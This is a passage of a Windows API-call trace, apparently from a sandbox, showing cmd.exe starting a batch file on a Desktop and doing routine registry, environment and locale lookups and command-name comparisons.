lpSystemTimeAsFileTime=0x34fefc*(dwLowDateTime=0x2fa1e800, dwHighDateTime=0x1d68287)) [0198.983] GetCurrentProcessId () returned 0xaec [0198.983] GetCurrentThreadId () returned 0x5b4 [0198.983] GetTickCount () returned 0x115e1f6 [0198.983] QueryPerformanceCounter (in: lpPerformanceCount=0x34fef4 | out: lpPerformanceCount=0x34fef4*=31932214677) returned 1 [0198.989] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0198.989] __set_app_type (_Type=0x1) [0198.989] __p__fmode () returned 0x770331f4 [0198.989] __p__commode () returned 0x770331fc [0198.989] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0198.989] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0198.990] GetCurrentThreadId () returned 0x5b4 [0198.990] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5b4) returned 0x60 [0198.990] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.990] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0198.990] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.991] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.991] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34fe8c | out: phkResult=0x34fe8c*=0x0) returned 0x2 [0198.991] VirtualQuery (in: lpAddress=0x34fec3, lpBuffer=0x34fe5c, dwLength=0x1c | out: lpBuffer=0x34fe5c*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.991] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34fe5c, dwLength=0x1c | out: lpBuffer=0x34fe5c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0198.991] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34fe5c, dwLength=0x1c | out: lpBuffer=0x34fe5c*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0198.991] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34fe5c, dwLength=0x1c | out: lpBuffer=0x34fe5c*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.991] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34fe5c, dwLength=0x1c | out: lpBuffer=0x34fe5c*(BaseAddress=0x350000, AllocationBase=0x350000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0198.991] GetConsoleOutputCP () returned 0x1b5 [0198.991] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0198.992] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0198.992] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.992] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0198.992] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.992] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0198.992] _get_osfhandle (_FileHandle=1) returned 0x7 [0198.993] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0198.993] _get_osfhandle (_FileHandle=0) returned 0x3 [0198.993] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0198.993] _get_osfhandle (_FileHandle=0) returned 0x3 [0198.993] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0198.994] GetEnvironmentStringsW () returned 0x362118* [0198.994] GetProcessHeap () returned 0x350000 [0198.994] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x362bf0 [0198.994] FreeEnvironmentStringsW (penv=0x362118) returned 1 [0198.994] GetProcessHeap () returned 0x350000 [0198.994] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4) returned 0x3618b0 [0198.994] GetEnvironmentStringsW () returned 0x362118* [0198.994] GetProcessHeap () returned 0x350000 [0198.994] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x3636c8 [0198.995] FreeEnvironmentStringsW (penv=0x362118) returned 1 [0198.995] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34edfc | out: phkResult=0x34edfc*=0x68) returned 0x0 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x0, lpData=0x34ee08*=0x0, lpcbData=0x34ee00*=0x1000) returned 0x2 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x1, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x0, lpData=0x34ee08*=0x1, lpcbData=0x34ee00*=0x1000) returned 0x2 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x0, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x40, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x40, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.995] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x0, lpData=0x34ee08*=0x40, lpcbData=0x34ee00*=0x1000) returned 0x2 [0198.995] RegCloseKey (hKey=0x68) returned 0x0 [0198.995] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34edfc | out: phkResult=0x34edfc*=0x68) returned 0x0 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x0, lpData=0x34ee08*=0x40, lpcbData=0x34ee00*=0x1000) returned 0x2 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x1, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x0, lpData=0x34ee08*=0x1, lpcbData=0x34ee00*=0x1000) returned 0x2 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x0, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x9, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x4, lpData=0x34ee08*=0x9, lpcbData=0x34ee00*=0x4) returned 0x0 [0198.996] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34ee04, lpData=0x34ee08, lpcbData=0x34ee00*=0x1000 | out: lpType=0x34ee04*=0x0, lpData=0x34ee08*=0x9, lpcbData=0x34ee00*=0x1000) returned 0x2 [0198.996] RegCloseKey (hKey=0x68) returned 0x0 [0198.996] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2e2 [0198.996] srand (_Seed=0x5f51e2e2) [0198.996] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"\"" [0198.996] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"\"" [0198.997] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0198.997] GetProcessHeap () returned 0x350000 [0198.997] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x362118 [0198.997] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x362120, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0198.998] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0198.998] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0198.998] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0198.998] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0198.998] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0198.998] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0198.998] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0198.998] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0198.998] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0198.998] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0198.998] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0198.998] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0198.998] GetProcessHeap () returned 0x350000 [0198.998] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x362bf0 | out: hHeap=0x350000) returned 1 [0198.998] GetEnvironmentStringsW () returned 0x362330* [0198.998] GetProcessHeap () returned 0x350000 [0198.998] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xae2) returned 0x364c90 [0198.999] FreeEnvironmentStringsW (penv=0x362330) returned 1 [0198.999] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.999] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0198.999] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0198.999] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0198.999] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0198.999] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0198.999] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0198.999] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0198.999] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0198.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0198.999] GetProcessHeap () returned 0x350000 [0198.999] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x54) returned 0x3617e0 [0198.999] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34fbc8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0199.000] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34fbc8, lpFilePart=0x34fbc4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34fbc4*="Desktop") returned 0x25 [0199.000] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0199.000] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f944 | out: lpFindFileData=0x34f944*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x365780 [0199.000] FindClose (in: hFindFile=0x365780 | out: hFindFile=0x365780) returned 1 [0199.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f944 | out: lpFindFileData=0x34f944*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x365780 [0199.000] FindClose (in: hFindFile=0x365780 | out: hFindFile=0x365780) returned 1 [0199.000] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0199.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f944 | out: lpFindFileData=0x34f944*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x365780 [0199.001] FindClose (in: hFindFile=0x365780 | out: hFindFile=0x365780) returned 1 [0199.001] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0199.001] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0199.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0199.001] GetProcessHeap () returned 0x350000 [0199.001] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364c90 | out: hHeap=0x350000) returned 1 [0199.001] GetEnvironmentStringsW () returned 0x3641a0* [0199.001] GetProcessHeap () returned 0x350000 [0199.001] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb36) returned 0x365fc0 [0199.002] FreeEnvironmentStringsW (penv=0x3641a0) returned 1 [0199.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0199.002] GetProcessHeap () returned 0x350000 [0199.002] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3617e0 | out: hHeap=0x350000) returned 1 [0199.002] GetProcessHeap () returned 0x350000 [0199.002] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400e) returned 0x366b00 [0199.003] GetProcessHeap () returned 0x350000 [0199.003] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xfa) returned 0x362e70 [0199.003] GetProcessHeap () returned 0x350000 [0199.003] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4008) returned 0x36ab18 [0199.003] GetProcessHeap () returned 0x350000 [0199.003] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4008) returned 0x36eb28 [0199.004] GetProcessHeap () returned 0x350000 [0199.004] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366b00 | out: hHeap=0x350000) returned 1 [0199.004] GetConsoleOutputCP () returned 0x1b5 [0199.004] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0199.004] GetUserDefaultLCID () returned 0x409 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34fd08, cchData=128 | out: lpLCData="0") returned 2 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34fd08, cchData=128 | out: lpLCData="0") returned 2 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34fd08, cchData=128 | out: lpLCData="1") returned 2 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0199.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0199.006] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0199.006] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0199.008] GetProcessHeap () returned 0x350000 [0199.008] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x20c) returned 0x362f78 [0199.008] GetConsoleTitleW (in: lpConsoleTitle=0x362f78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.008] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0199.009] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0199.009] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0199.010] GetProcessHeap () returned 0x350000 [0199.010] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x366b00 [0199.010] GetProcessHeap () returned 0x350000 [0199.011] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366b00 | out: hHeap=0x350000) returned 1 [0199.014] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0199.014] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0199.014] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0199.014] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0199.014] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0199.014] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0199.014] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0199.014] GetProcessHeap () returned 0x350000 [0199.014] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x58) returned 0x363190 [0199.014] GetProcessHeap () returned 0x350000 [0199.014] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x72) returned 0x372b50 [0199.017] GetProcessHeap () returned 0x350000 [0199.017] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x8a) returned 0x3631f0 [0199.019] GetConsoleTitleW (in: lpConsoleTitle=0x34fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.497] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0199.497] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0199.497] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0199.497] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0199.497] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0199.497] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0199.497] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0199.497] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0199.497] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0199.497] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0199.498] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0199.498] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0199.498] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0199.498] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0199.498] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0199.498] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0199.498] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0199.498] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0199.498] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0199.498] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0199.499] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0199.499] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0199.499] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0199.499] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0199.499] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0199.499] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0199.499] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0199.499] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0199.499] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0199.499] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0199.500] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0199.500] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0199.500] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0199.500] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0199.500] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0199.500] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0199.500] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0199.500] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0199.500] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0199.500] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0199.500] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0199.500] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0199.501] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0199.501] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0199.501] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0199.501] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0199.501] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0199.501] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0199.501] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0199.501] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0199.501] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0199.501] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0199.501] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0199.501] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0199.501] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0199.502] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0199.502] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0199.502] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0199.502] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0199.502] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0199.502] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0199.502] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0199.502] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0199.502] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0199.502] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0199.502] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0199.503] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0199.503] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0199.503] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0199.503] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0199.503] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0199.503] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0199.503] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0199.503] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 